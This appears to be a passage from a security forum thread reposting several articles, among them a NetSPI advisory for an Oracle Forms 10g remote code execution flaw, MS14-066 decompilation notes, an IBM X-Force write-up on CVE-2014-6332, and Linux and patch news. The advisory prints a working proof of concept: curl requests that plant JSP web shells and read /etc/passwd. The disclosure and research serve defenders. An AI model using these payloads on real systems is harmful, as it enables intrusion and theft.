this time, JPEG 2000 is not widely supported by web browsers but is used in digital cameras and medical imagery. There is also a related standard, Motion JPEG 2000, used in the digital film industry. References Home pages for the JPEG committee and JPEG 2000 committee Tinku Archarya, Ping-Sing Tsai, JPEG2000 Standard for Image Compression: Concepts, Algorithms and VLSI Architectures, Wiley, Hoboken. 2005. Jin Li, Image Compression: The mathematics of JPEG 2000, Modern Signal Processing, Volume 46, 2003. Ingrid Daubechies, Ten lectures on wavelets, SIAM, Philadelphia. 1992. K.R. Rao, Patrick Yip, Discrete Cosine Transform: Algorithms, Advantages, Applications, Academic Press, San Diego. 1990. Wikipedia entries for JPEG and JPEG 2000. David Austin Grand Valley State University david at merganser.math.gvsu.edu Those who can access JSTOR can find some of the papers mentioned above there. For those with access, the American Mathematical Society's MathSciNet can be used to get additional bibliographic information and reviews of some these materials. Some of the items above can be accessed via the ACM Portal , which also provides bibliographic services. Sursa: Feature Column from the AMS
  4. Advisory: Oracle Forms 10g Unauthenticated Remote Code Execution (CVE-2014-4278) Khai Tran | October 14, 2014 Vulnerability Description: Oracle Forms 10g contains code that does not properly validate user input. This could allow an unauthenticated user to execute arbitrary commands on the remote Oracle Forms server. Also affected: Oracle E-Business Suite 12.0.6, 12.1.3, 12.2.2, 12.2.3 and 12.2.4 [1] Vulnerability Details: When a user launches a new Oracle Forms application, the application first invokes the FormsServlet class to initiate connection. The application then invokes the ListenerServlet class, which launches frmweb process in the background of the remote server. The normal URL to invoke ListenerServlet looks like: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]http://127.0.0.1:8889/forms/lservlet?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5&ifcmd=getinfo&ifip=127.0.0.1 [/TD] [/TR] [/TABLE] With the above URL, the normal frmweb process is started with the following parameters: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]frmweb server webfile=HTTP-0,0,0,em_mode,127.0.0.1 [/TD] [/TR] [/TABLE] Where ifip parameter is controllable by user input. The frmweb executable, however, accepts one more parameter: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]frmweb server webfile=HTTP-0,0,0,em_mode,127.0.0.1,logfile [/TD] [/TR] [/TABLE] A log file, named based on the user supplied log name, is created on the server following the request. The content of the log file contains the log file name: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]FORMS CONNECTION ACTIVITY LOG FILE Developer:Forms/LogRecord [Fri May 9 16:46:58 2014 EDT]::Server Start-up Data: Server Log Filename: logfile Server Hostname: oralin6u5x86 Server Port: 0 Server Pool: 1 Server Process Id: 15638 [/TD] [/TR] [/TABLE] The Oracle Forms application does not perform adequate input validation on the logfile parameter and allows directory traversal sequences (../). By controlling the ifip parameter passed to the ListenerServlet class, an attacker can now control the logfile location and partially its content as well. Combined with the weak configuration of the remote web server that allows jsp files to be served under http://host: port/forms/java location, attacker could upload a remote shell and execute arbitrary code on the server. Technical challenges: The web server does not seem to accept white spaces or new lines; it also limits the number of characters that could be passed onto the frmweb executable. To execute Operating System command, a custom JSP shell was developed that bypass such restrictions. Verification: Proof-of-concept exploit (tested with Oracle Development Suite 10.1.2.0.2, installed on Oracle Linux 5u6): Upload first shell to execute commands (see Other Notes for the decoded version): [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]curl --request GET 'http://127.0.0.1:8889/forms/lservlet?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5&ifcmd=getinfo&ifip=127.0.0.1,./java/<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"))%3b%25>.jsp' [/TD] [/TR] [/TABLE] After the first step, attacker could execute OS command via the blind shell, located at: http://127.0.0.1:8889/forms/java/<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues(“cmd”))%3b%25>.jsp. To retrieve the command results, they could use the first blind shell to write the second JSP shell, which was based of fuzzdb’s cmd.jsp [3] [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]curl --request GET 'http://127.0.0.1:8889/forms/java/<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"))%3b%25>.jsp?cmd=/bin/sh&cmd=-c&cmd=echo%20PCVAcGFnZSBpbXBvcnQ9ImphdmEuaW8uKiIlPjwlU3RyaW5nIG9wPSIiLHM9IiI7dHJ5e1Byb2Nlc3MgcD1SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7QnVmZmVyZWRSZWFkZXIgc0k9bmV3IEJ1ZmZlcmVkUmVhZGVyKG5ldyBJbnB1dFN0cmVhbVJlYWRlcihwLmdldElu-cHV0U3RyZWFtKCkpKTt3aGlsZSgocz1zSS5yZWFkTGluZSgpKSE9bnVsbCl7b3ArPXM7fX1jYXRjaChJT0V4Y2VwdGlvbiBlKXtlLnByaW50U3RhY2tUcmFjZSgpO30lPjwlPW9wJT4%3d|base64%20--decode%3E./forms/java/cmd.jsp' [/TD] [/TR] [/TABLE] The second shell is now available at http://127.0.0.1:8889/forms/java/cmd.jsp. To get the content of /etc/passwd on the remote server: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]curl --request GET 'http://127.0.0.1:8889/forms/java/cmd.jsp?cmd=cat+/etc/passwd' [/TD] [/TR] [/TABLE] Recommendations for Oracle: Create a white list of characters that are allowed to appear in the input and accept input composed exclusively of characters in the approved set. Consider removing support for jsp files on the remote web server if it is not required. Other notes: URL-decoded version of the first blind JSP shell: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]<%java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"));%> [/TD] [/TR] [/TABLE] Base64-decoded version of the second JSP shell: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code]<%@page import="java.io.*"%><%String op="",s="";try{Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s=sI.readLine())!=null){op+=s;}}catch(IOException e){e.printStackTrace();}%><%=op%> [/TD] [/TR] [/TABLE] Oracle Forms 10g is also vulnerable to a simple DOS attack: each time the URL http://127.0.0.1:8889/forms/lservlet?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5&ifcmd=getinfo&ifip=127.0.0.1 is invoked, a frmweb process will be launched in the background. An attacker could exhaust server resources simply by requesting the same URL multiple times. I believe this behavior is fixed in version 11g and onwards with connection pooling For Oracle Forms 11g and onwards, it is still possible to inject into command arguments of the frmweb executable, through a different vector. However the frmweb executable does not seem to recognize that last argument as the log file location; therefore another vulnerability may be required in order to gain code execution. Since Oracle has ended its support for Forms 10g [2], the patch for Forms 10g itself was not released in the 2014 October CPU [1]. However, it appeared that Forms 10g component is still being used in E-Business Suite; therefore a patch for it was released [1]. If your organization is still using Oracle Forms 10g, I would recommend backport the fix from E-Business Suite, or upgrade to Forms version 11 or newer. Report Timeline: May 15, 2014: vulnerability was reported to Oracle. June 18, 2014: vulnerability was confirmed by Oracle October 14, 2014: patch released References: [1] Oracle Critical Patch Update - October 2014 [2] https://blogs.oracle.com/grantronald/entry/alert_for_forms_customers_running_oracle_forms_10g [3] https://github.com/rustyrobot/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp Sursa: https://blog.netspi.com/advisory-oracle-forms-10g-unauthenticated-remote-code-execution-cve-2014-4278/
  5. MS14-066 schannel.dll SPVerifySignature (Windows 2003 SP2) /* Summarizing the most likely conditions here these bugs occur: Code Execution: Heap smash via qmemcpy() if CryptDecodeObject() returns more than 40 bytes in pcbStructInfo Verification Bypass: A failed decode results in a positive return value. This is not STATUS_SUCCESS, but a caller that is checking <0 vs == 0 would think verification succeeded on a bad decode. */ //----- (7676F6D4) -------------------------------------------------------- int __stdcall SPVerifySignature(HCRYPTPROV hProv, int a2, ALG_ID Algid, BYTE *pbData, DWORD dwDataLen, BYTE *pbEncoded, DWORD cbEncoded, int a8) { signed int v8; // esi@4 BOOL v9; // eax@8 DWORD v10; // eax@14 DWORD pcbStructInfo; // [sp+Ch] [bp-3Ch]@11 HCRYPTKEY phKey; // [sp+10h] [bp-38h]@1 HCRYPTHASH phHash; // [sp+14h] [bp-34h]@1 BYTE *pbSignature; // [sp+18h] [bp-30h]@1 char pvStructInfo[40]; // [sp+1Ch] [bp-2Ch]@11 phKey = 0; phHash = 0; pbSignature = 0; if ( hProv && a2 ) { // Allocate cbEncoded bytes on the heap for the signature pbSignature = (BYTE *)SPExternalAlloc(cbEncoded); if ( !pbSignature ) { // Exit early if the allocation failed v8 = -2146893056; goto LABEL_18; } // Import the key and create the hash, bailing out if it fails if ( !CryptImportKey(hProv, *(const BYTE **)a2, *(_DWORD *)(a2 + 4), 0, 0, &phKey) || !CryptCreateHash(hProv, Algid, 0, 0, &phHash) ) goto LABEL_12; // Verify that CryptHashData or CryptSetHashParam succeeds (but how is a8 being set?) v9 = a8 ? CryptHashData(phHash, pbData, dwDataLen, 0) : CryptSetHashParam(phHash, 2u, pbData, 0); if ( !v9 ) goto LABEL_12; if ( *(_DWORD *)(*(_DWORD *)a2 + 4) == 8704 ) { // Indicate that we have 40 bytes to decode the signature value pcbStructInfo = 40; // CryptDecodeObject() states that pvStructInfo can be larger than pcbStructInfo // Bail out if the decode fails /* BOOL WINAPI CryptDecodeObject( _In_ DWORD dwCertEncodingType, (X509_ASN_ENCODING) _In_ LPCSTR lpszStructType, (X509_DSS_SIGNATURE) _In_ const BYTE *pbEncoded, (Caller) _In_ DWORD cbEncoded, (Caller) _In_ DWORD dwFlags, (0) _Out_ void *pvStructInfo, (40 byte stack variable) _Inout_ DWORD *pcbStructInfo (in:40, out:arbitrary) ); pcbStructInfo [in, out]: A pointer to a DWORD value specifying the size, in bytes, of the buffer pointed to by the pvStructInfo parameter. When the function returns, this DWORD value contains the size of the decoded data copied to pvStructInfo. The size contained in the variable pointed to by pcbStructInfo can indicate a size larger than the decoded structure, as the decoded structure can include pointers to other structures. This size is the sum of the size needed by the decoded structure and other structures pointed to. */ if ( !CryptDecodeObject(X509_ASN_ENCODING, X509_DSS_SIGNATURE, pbEncoded, cbEncoded, 0, &pvStructInfo, &pcbStructInfo) ) { LABEL_12: // this might be the signature bypass vector if the caller incorrectly checks <0 vs STATUS_SUCCESS GetLastError(); v8 = 3; goto LABEL_18; } v10 = pcbStructInfo; // This is likely our RCE vector, if pcbStructInfo > cbEncoded qmemcpy(pbSignature, &pvStructInfo, pcbStructInfo); // Changes cbEncoded to the (possibly bad) returned value of pcbStructInfo cbEncoded = v10; } else { ReverseMemCopy((unsigned int)pbSignature, (int)pbEncoded, cbEncoded); } v8 = CryptVerifySignatureA(phHash, pbSignature, cbEncoded, phKey, 0, 0) != 0 ? 0 : -2147483391; } else { v8 = -1; } LABEL_18: if ( phKey ) CryptDestroyKey(phKey); if ( phHash ) CryptDestroyHash(phHash); if ( pbSignature ) SPExternalFree(pbSignature); return v8; } Sursa: https://gist.github.com/hmoore-r7/3379af8b0419ddb0c76b
  6. OpenSUSE 13.2 OpenSUSE 13.2 supercharged with smoother setup, system snapshots, Btrfs, and more Chris Hoffman @chrisbhoffman OpenSUSE 13.2 was released a week ago. As with the recent Fedora update, the latest release of openSUSE took a year to develop instead of the standard six months as the organization retooled its development practices. SUSE Linux has now been around for over 20 years, and it’s still going strong. As usual, the latest release serves as a foundation for developing Novell’s SUSE Linux Enterprise and brings some significant new improvements. So let’s dive right in! A streamlined installer OpenSUSE provides live media, and that live media can now be persistent. This means you could set up a live openSUSE 13.2 USB stick and have your files and settings saved on it between uses. But openSUSE still recommends using an old-fashioned DVD installer disc of 4.7 GB in size for actually installing the operating system on your computer. The installer lets you choose your preferred desktop—GNOME, KDE, or another one. GNOME and KDE are on fairly equal footing in openSUSE these days, but the openSUSE community has always loved KDE. KDE 4.14 is the default, although GNOME users will also be right at home. The openSUSE installer has seen a lot of much-needed polish and streamlining. Previously, the installer had a “phase 2”—first it installed on your system, and then you’d reboot into your new system and be forced to go through an additional setup process. Now the installer does everything during the standard installation process, and there is no phase 2. The installer also has a “brand new look and feel focused on usability” and a removal of configuration screens like LDAP user authentication and printer setup. You can adjust these settings after you install the system, if you need to. Btrfs and file system snapshots OpenSUSE uses the new Btrfs file system by default. If you prefer another Linux distribution, it will probably start using Btrfs soon, too. It’s clear that this is the future file system that will replace ext4, so the only question is when it’s stable enough for Linux distributions to flip the switch. OpenSUSE has decided the time is now. Btrfs is sometimes pronounced “better FS,” and that’s what it is. It’s faster, more robust, and more modern. One of its most interesting features is the ability to create file system snapshots. OpenSUSE uses this to great effect, providing a boot menu option that allows you to boot straight into those previous snapshots via the “Snapper” tool. This is great for recovering from system problems, as it allows you to boot straight into an older file system state before corruption and other problems occurred. The snapshot feature is also available in the just-released SUSE Linux Enterprise Server 12. This is an enterprise-grade feature—not just a new-and-unstable toy. Want to stay up to date on Linux, BSD, Chrome OS, and the rest of the World Beyond Windows? Bookmark the World Beyond Windows column page or follow our RSS feed. Yet another faster setup tool The YaST configuration tool—literally an abbreviation for “Yet another Setup Tool”—is used for system configuration. This has always been one of SUSE’s most distinctive features. In the past, it’s sometimes been overly slow and clunky, but it also provides a one-stop graphical configuration interface for practically everything you’d want to do when configuring a Linux system, from modifying your bootloader’s menu to configuring various different types of servers. OpenSUSE 13.2's YAST on the KDE desktop environment. In openSUSE 13.1, YaST was rewritten in the Ruby programming language. They’ve now had time to polish that work better. YaST is now faster, more stable, and better integrated with Btrfs, systemd, and other modern technologies. The usual upgrades As usual with Linux distribution updates, many— if not most—of the changes you’ll see are just the result of upgrading to the latest versions of the various upstream software packages. This means Linux kernel 3.16, KDE 4.14, and GNOME 3.14. OpenSUSE’s repositories now include the MATE desktop, too—good news for GNOME 2 diehards! A preview of KDE’s new Plasma 5.1 desktop is also available. For more details about all the various changes, check out the official list of major features. Sursa: OpenSUSE 13.2 Linux adds smoother setup, system snapshots, Btrfs, more
  7. Iesim in strada, imi plac protestele
  8. Microsoft's silent, secret security updates Summary: Does Microsoft find and fix security problems in their own products? You might assume so, but the company gives no reason to believe it. I assume they do, but silently. By Larry Seltzer for Zero Day | November 12, 2014 -- 13:00 GMT (05:00 PST) It's an odd and conspicuous feature of Microsoft's security bulletins that they never report vulnerabilities found internally at Microsoft. All of the credits go to outsiders. For example, yesterday's Patch Tuesday updates fixed 32 identified vulnerabilities, none of which were credited to Microsoft. These companies, bug bounty programs and individuals were credited: Baidu Security Team (X-Team) Context Information Security EY Esage Lab Google Project Zero Google Security Team HP's Zero Day Initiative IBM X-Force Kaspersky Lab KoreLogic Security McAfee Security Team Palo Alto Networks Qihoo 360 Secunia Research Two unaffiliated individuals: Takeshi Terada, Daniel Trebbien I eyeballed every disclosure released this year and saw no vulnerabilities credited to Microsoft. I've been following this for many years and can say that it's always been thus. There are some vaguer cases. The blockbuster Schannel vulnerability in MS14-066 is stated to be "privately-reported" but no credit is given; this happens now and then, perhaps ten times this year. Sometimes the credited party is named with no organizational affiliation, as with the two individuals in the list above, but I've checked a bunch of these and none of them are Microsoft people. Sometimes the credited party is anonymous, but always reported as an outsider reporting to Microsoft. (As an aside, with this month Microsoft has started putting all the credits in a single acknowledgements page rather than spreading them around the individual security bulletins.) Does Microsoft actually never find vulnerabilities in their own products? This is hard to believe. Both Google and Apple regularly give credit to internal researchers. If Microsoft does find vulnerabilities, what's happening to them? Does Microsoft just not fix them? Do they pass them on to friends who get bug bounties from HP's ZDI (Zero Day Initiative)? Or maybe Microsoft or their employees go directly to ZDI. Consider these two credits from the August Cumulative Security Update for Internet Explorer: An anonymous researcher, working with HP's Zero Day Initiative, for reporting the Internet Explorer Memory Corruption Vulnerability (CVE-2014-4052) Sky, working with HP's Zero Day Initiative, for reporting the Internet Explorer Memory Corruption Vulnerability (CVE-2014-4058) Who's to say these aren't Microsoft employees? But I think it's more likely Microsoft is hiding security updates inside other updates, such as non-security updates. Consider the episode a few months ago when Microsoft had to pull a number of updates after they borked users' systems. One of those updates was an "Update to support the new currency symbol for the Russian ruble in Windows." This is one of the updates that caused systems to go into infinite reboot loops. Just for adding a new Ruble symbol to the system you get that kind of catastrophic failure? Perhaps there was more to it. Alternatively, Microsoft could be hiding security updates inside of other security updates. There have been ten Cumulative Updates for Internet Explorer so far this year. It would be easy to hide another patch in one of those. In the September Cumulative Update Microsoft said "In addition to the changes that are listed for the vulnerabilities described in this bulletin, this update includes defense-in-depth updates to the Internet Explorer XSS Filter to help improve security-related features." The same text is in the June Cumulative Update. That's some pretty elastic description there and Cumulative updates, by definition, are large and complicated. The main argument for why I'm wrong is that it would be possible for outsiders to reverse-engineer the differences between versions, as they are said to do in order to find the vulnerable code and write exploits for it, and they would then write exploits for the silently-patched vulnerabilities. But perhaps this actually happens all the time. (That's what I see as the main argument; please tell me why you think I'm wrong in the comments below.) Of course I don't actually know that Microsoft is hiding secret security updates, but the alternatives aren't exactly flattering. It's especially odd to think that Microsoft doesn't hunt for security bugs in their own products when they do so in other companies'. Just yesterday, one of the many vulnerabilities fixed by Adobe in Flash Player (CVE-2014-8442) was reported by "Behrang Fouladi and Axel Souchet of Microsoft Vulnerability Research." Over the last ten years or so Microsoft has gone to great lengths to gain credibility in security and I think they are generally respected in this regard. Why would they not acknowledge any internally-discovered vulnerabilities? Sounds incredible to me. Microsoft declined to comment. Sursa: Microsoft's silent, secret security updates | ZDNet
  9. Adobe fixes 18 vulnerabilities in Flash Player By Lucian Constantin IDG News Service | Nov 12, 2014 5:20 AM PT Adobe Systems released critical security updates Tuesday for Flash Player to address 18 vulnerabilities, many of which can be remotely exploited to compromise underlying systems. Fifteen of the patched vulnerabilities can result in arbitrary code execution, one can be exploited to disclose session tokens and two allow attackers to escalate their privileges from the low to medium integrity level, Adobe said in a security advisory. The company advises Windows and Mac users to update to the newly released Flash Player version 15.0.0.223. Linux users should update to Flash Player 11.2.202.418. The Flash Player Extended Support Release, which is based on Flash Player 13 was also updated to version 13.0.0.252. [What's wrong with this picture? The NEW clean desk test]The Flash Player plug-ins bundled with Google Chrome and Internet Explorer on Windows 8 and 8.1 will be upgraded automatically through those browsers' update mechanisms. Adobe also released new versions of Adobe AIR, the company's runtime and software development kit (SDK) for rich Internet applications, because it bundles Flash Player. Users of the AIR desktop and Android runtime, as well as users of AIR SDK and AIR SDK & Compiler should update to version 15.0.0.356. Many of the vulnerabilities patched in these new Flash Player releases were found and reported by researchers from Google, Microsoft, McAfee and Trend Micro. Adobe said via email that it is not aware of exploits for these vulnerabilities being used in the wild. However, as demonstrated last month, cybercriminals don't waste a lot of time before they start to attack newly patched Flash Player flaws. Lucian Constantin — Romania Correspondent Lucian Constantin writes about information security, privacy, and data protection for the IDG News Service. Sursa: Adobe fixes 18 vulnerabilities in Flash Player | CSO Online
  10. ntroductory Intel x86-64: Architecture, Assembly, Applications, & Alliteration Creator: Xeno Kovah @XenoKovah License: Creative Commons: Attribution, Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/) Class Prerequisites: Must have a basic understanding of the C programming language, as this class will show how C code corresponds to assembly code. Lab Requirements: Requires a 64 bit Windows 7 system with Visual C++ 2012 Express Edition. Requires a 64 bit Linux system with gcc and gdb, and the CMU binary bomb installed. Either system can be physical or virtual. Class Textbook: "Introduction to 64 Bit Assembly Programming for Linux and OS X: Third Edition" by Ray Seyfarth Recommended Class Duration: 2 days Creator Available to Teach In-Person Classes: Yes Author Comments: Intel processors have been a major force in personal computing for more than 30 years. An understanding of low level computing mechanisms used in Intel chips as taught in this course serves as a foundation upon which to better understand other hardware, as well as many technical specialties such as reverse engineering, compiler design, operating system design, code optimization, and vulnerability exploitation. 25% of the time will be spent bootstrapping knowledge of fully OS-independent aspects of Intel architecture. 50% will be spent learning Windows tools and analysis of simple programs. The final 25% of time will be spent learning Linux tools for analysis. This class serves as a foundation for the follow on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown it is possible to read most programs by knowing only around 20-30 instructions and their variations. The instructor-led lab work will include: * Stepping through a small program and watching the changes to the stack at each instruction (push, pop, call, ret (return), mov) * Stepping through a slightly more complicated program (adds lea(load effective address), add, sub) * Understanding the correspondence between C and assembly control transfer mechanisms (e.g. goto in C == jmp in ams) * Understanding conditional control flow and how loops are translated from C to asm(conditional jumps, jge(jump greater than or equal), jle(jump less than or equal), ja(jump above), cmp (compare), test, etc) * Boolean logic (and, or, xor, not) * Logical and Arithmetic bit shift instructions and the cases where each would be used (shl (logical shift left), shr (logical shift right), sal (arithmetic shift left), sar(arithmetic shift right)) * Signed and unsigned multiplication and division * Special one instruction loops and how C functions like memset or memcpy can be implemented in one instruction plus setup (rep stos (repeat store to string), rep mov (repeat mov) * Misc instructions like leave and nop (no operation) * Running examples in the Visual Studio debugger on Windows and the Gnu Debugger (GDB) on Linux * The famous "binary bomb" lab from the Carnegie Mellon University computer architecture class, which requires the student to do basic reverse engineering to progress through the different phases of the bomb giving the correct input to avoid it “blowing up”. This will be an independent activity. Knowledge of this material is a prerequisite for future classes such as Intermediate x86, Rootkits, Exploits, and Introduction to Reverse Engineering. To submit any suggestions, corrections, or explanations of things I didn’t know the reasons for, please email me at the address above. Author Biography: Xeno has a BS in CS from UMN, and an MS in security from CMU, which he attended through the National Science Foundation Scholarship for Service (aka CyberCorps) program. He has been attending security conferences since 1999, working full time on security research since 2007, and presenting at conferences since 2012. He is a little bit broke in the brain in that way that makes him feel the need to collect things. Most recently he has been collecting conference speaking credits. He has presented at BlackHat USA/EUR, IEEE S&P, ACM CCS, Defcon, CanSecWest, PacSec, Hack in the Box KUL, Microsoft BlueHat, Shmoocon, Hack.lu, NoSuchCon, SummerCon, ToorCon, DeepSec, VirusBulletin, MIRCon, AusCERT, Trusted Infrastructure Workshop, NIST NICE Workshop, DOD Information Assurance Symposium, and MTEM. His joint work has also been presented by his colleagues at Syscan, EkoParty, Hack in the Box AMS, Hack in Paris, Sec-T, SecTor, Source Boston, and Breakpoint/Ruxcon. Gotta collect ‘em all! (he says, as someone who is *not* of the Pokemon generation, but understands that particular form of psychological manipulation) Class Materials All Materials (.zip of .pptx 302 slides), pdf(manuals), visual studio(code) files) All Materials (.zip of .key(302 slides), pdf(manuals), visual studio(code) files) All Materials (.zip of .pdf(302 slides), pdf(manuals), visual studio(code) files) Introduction (26 slides) Refreshers (5 slides) Architecture (19 slides) The Stack (22 slides) Example 1 (43 slides) Local variables (15 slides) Function parameter passing (14 slides) Control flow (15 slides) Boolean logic (9 slides) Shifts (11 slides) Multiply & divide (5 slides) Rep Stos (9 slides) Rep Movs (8 slides) Assembly syntax (Intel vs. AT&T syntax) (4 slides) Linux tools (21 slides) Inline assembly & raw byte emitting (10 slides) Read The Fun Manual! (20 slides) Variable length assembly instructions (3 slides) Effects of compiler options (4 slides) Bomb lab (6 slides) Messing with disasemblers (7 slides) Twos compliment (6 slides) Basic buffer overflow lab (12 slides) Conclusion (8 slides) Visual Studio Express 2012 code for labs 64 bit compiled copy of CMU Linux bomb lab ELF executable (originally from here) Sursa: http://opensecuritytraining.info/IntroX86-64.html
  11. IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows By Robert Freeman • November 11, 2014 The IBM X-Force Research team has identified a significant data manipulation vulnerability (CVE-2014-6332) with a CVSS score of 9.3 in every version of Microsoft Windows from Windows 95 onward. We reported this issue with a working proof-of-concept exploit back in May 2014, and today, Microsoft is patching it. It can be exploited remotely since Microsoft Internet Explorer (IE) 3.0. This complex vulnerability is a rare, “unicorn-like” bug found in code that IE relies on but doesn’t necessarily belong to. The bug can be used by an attacker for drive-by attacks to reliably run code remotely and take over the user’s machine — even sidestepping the Enhanced Protected Mode (EPM) sandbox in IE 11 as well as the highly regarded Enhanced Mitigation Experience Toolkit (EMET) anti-exploitation tool Microsoft offers for free. What Does This Mean? First, this means that significant vulnerabilities can go undetected for some time. In this case, the buggy code is at least 19 years old and has been remotely exploitable for the past 18 years. Looking at the original release code of Windows 95, the problem is present. With the release of IE 3.0, remote exploitation became possible because it introduced Visual Basic Script (VBScript). Other applications over the years may have used the buggy code, though the inclusion of VBScript in IE 3.0 makes it the most likely candidate for an attacker. In some respects, this vulnerability has been sitting in plain sight for a long time despite many other bugs being discovered and patched in the same Windows library (OleAut32). Second, it indicates that there may be other bugs still to be discovered that relate more to arbitrary data manipulation than more conventional vulnerabilities such as buffer overflows and use-after-free issues. These data manipulation vulnerabilities could lead to substantial exploitation scenarios from the manipulation of data values to remote code execution. In fact, there may be multiple exploitation techniques that lead to possible remote code execution, as is the case with this particular bug. Typically, attackers use remote code execution to install malware, which may have any number of malicious actions, such as keylogging, screen-grabbing and remote access. IBM X-Force has had product coverage with its network intrusion prevention system (IPS) since reporting this vulnerability back in May 2014, though X-Force hasn’t found any evidence of exploitation of this particular bug in the wild. I have no doubt that it would have fetched six figures on the gray market. The proof of concept IBM X-Force built uses a technique that other people have discovered, too. In fact, it was presented at this year’s Black Hat USA Conference. Technical Description In VBScript, array elements are actually Component Object Model (COM) SafeArrays. Each element is a fixed size of 16 bytes, with an initial WORD indicating the Variant type. Under normal circumstances, one will only have control of a maximum of 8 bytes of this data through either the Variant type for double values or for currency values. Array Elements: | Variant Type (WORD) | Padding (WORD) | Data High (DWORD) | Data Low (DWORD) | Cutting to the chase, VBScript permits in-place resizing of arrays through the command “redim preserve.” This is where the vulnerability is. redim preserve arrayname( newsizeinelements ) VBScript.dll contains a runtime evaluation method, CScriptRuntime::Run(VAR *), which farms out the SafeArray redimension task to OleAut32.dll with the SafeArrayRedim(…) function. Essentially, what happens is that fairly early on, SafeArrayRedim() will swap out the old array size (element count) with the resize request. However, there is a code path where, if an error occurs, the size is not reset before returning to the calling function, VBScript!CScriptRuntime::Run(). For VBScript, exploitation of this bug could have been avoided by invalidating the common “On Error Resume Next” VBScript code when the OleAut32 library returns with an error. Since it doesn’t, one can simply rely on this statement to regain script execution and continue to use “corrupted” objects. This VBScript code snippet is extremely common and its presence would not indicate that this vulnerability has been exploited. Exploitation of Vulnerability This is the fun part. Although the bug originates in some very old code within the OleAut32 library, I’m approaching exploitation from the perspective of VBScript within Internet Explorer because all versions since 3.0 are vulnerable through this vector. Exploitation is tricky, partially because array elements are a fixed size. Yet there are two additional issues that complicate exploitation. The first is that there is little opportunity to place arbitrary data where VBScript arrays are stored on the IE heap. The second issue is that, assuming you are now addressing outside the bounds of your VBScript array (Safe Array), you will find the unpleasant enforcement of Variant type compatibility matching. In the end, the key to exploitation toward reliable code execution was to take advantage of the difference in the element alignment of the arrays (16 bytes) and the alignment of the Windows heap (8 bytes). This provides opportunities to change the Variant type in an element of an adjacent array and to read that content back through the original array reference. In short, with this kind of memory manipulation available, an attacker can do a number of things. One possibility is to create arbitrary dispatch pointers for VT_DISPATCH or VT_UKNOWN types. This can lead to Data Execution Prevention (DEP) firing if the specified pointer does not correspond to a memory address with execution enabled. There are ways around that, too, but I’ll return to that later. Another possibility would be to use this attack to grab some heap data, but that is a little inconvenient because, again, you run into Variant type compatibility matching. If the location outside of the array boundary that would hold the Variant type is not a known Variant ID or combination on a read operation, or if it is not directly compatible on a write operation, nothing further will happen. However, again, one can abuse the Variant type of objects in the array. So if attackers start with a BSTR and create a Unicode representation of the data they want another type to point to, it can be used to create objects that can lead to more elaborate exploits. At the time I made the vulnerability discovery, I also happened to run across a blog post hinting that a combination of VT_ARRAY and VT_VARIANT could be useful in this respect. Massaging the data for the VT_VARIANT|VT_ARRAY object permits the use of any virtual address instead of being stuck with the relative addresses of the array boundaries we resized. Furthermore, as we are now dealing with an array of variants, we can use the vartype() command to obtain 16 bits of information from any address we specify. The reason for the 16 bits is just that COM variants max out at 16 bits of data. While we still have to deal with the variant compatibly enforcement, many exciting possibilities now exist. One of these possibilities permits a data-only attack. The next step for this possibility leverages a memory leak leading to the VBScript class object instance. Content can be left behind in the array data that was never intended to be read. By again changing the variant type of an object in the adjacent array, we can read information that ends up being the point to the VBScript class object. Coincidentally, multiple security researchers may have noticed that both Jscript and VBScript from Microsoft have a check to see whether they are running in a safe mode such as at the command prompt. This check looks at a member of the VBScript (or Jscript) class object to see whether it is in this safe mode. Another great coincidence is that not only can we reliably get to this location in memory using the address leak just discussed, but the nearby data in memory should always pass the variant type compatibility test and permit us to change the value and get code execution indirectly through running unsafe COM objects (think ActiveX) with arbitrary parameters. This is the same attack technique that Yang Yu presented at the Black Hat USA conference this year called the “Vital Point Strike.” Using this approach, which does not use shellcode or more exotic means such as return-oriented programming gadgets, both the EPM sandbox in IE as well as use of Microsoft’s EMET tool are bypassed. Let’s return to DEP for a moment. There are options here. For example, if there is any read+write+execute (+RWE) memory in a predictable location, we can manipulate objects to point to that memory. Similarly, we could create a large BSTR by pointing a BSTR to the +RWE memory and using the arbitrary write on top of null characters from the +RWE memory to set a large size. The hope is that we could do some in-place modifications with Unicode representations of shellcode. I haven’t tested this out, but it is an interesting idea. Subsequently, we could create arbitrary VT_DISPATCH or VT_UNKNOWN pointers that enable us to point back into the +RWE under our control. However, loading objects or plugins known to create +RWE by default is still a bit of a hassle. If we have the ability to read arbitrary memory and create arbitrary VT_DISPATCH and VT_UNKNOWN pointers, and we have some ability to control data in memory — either through ordinary heap data we can use with our VBScript and/or data we can touch and change (compatibility testing passes) — we should have no trouble creating Windows API calls. This happens to be another method Yang presented and called “Interdimensional Code Execution.” In fact, using it to disable DEP is possible but somewhat of a waste of an elegant approach for a sledgehammer result. Hopefully, if you’ve made it this far, you have a pretty good idea how powerful the data attacks facilitated by this bug can be. Again, our disclosure was originally submitted a number of months ago, and while we are not exclusive with the exploitation techniques described, it contributes well toward our goal of describing a significant vulnerability and how it was turned into a viable proof-of-concept 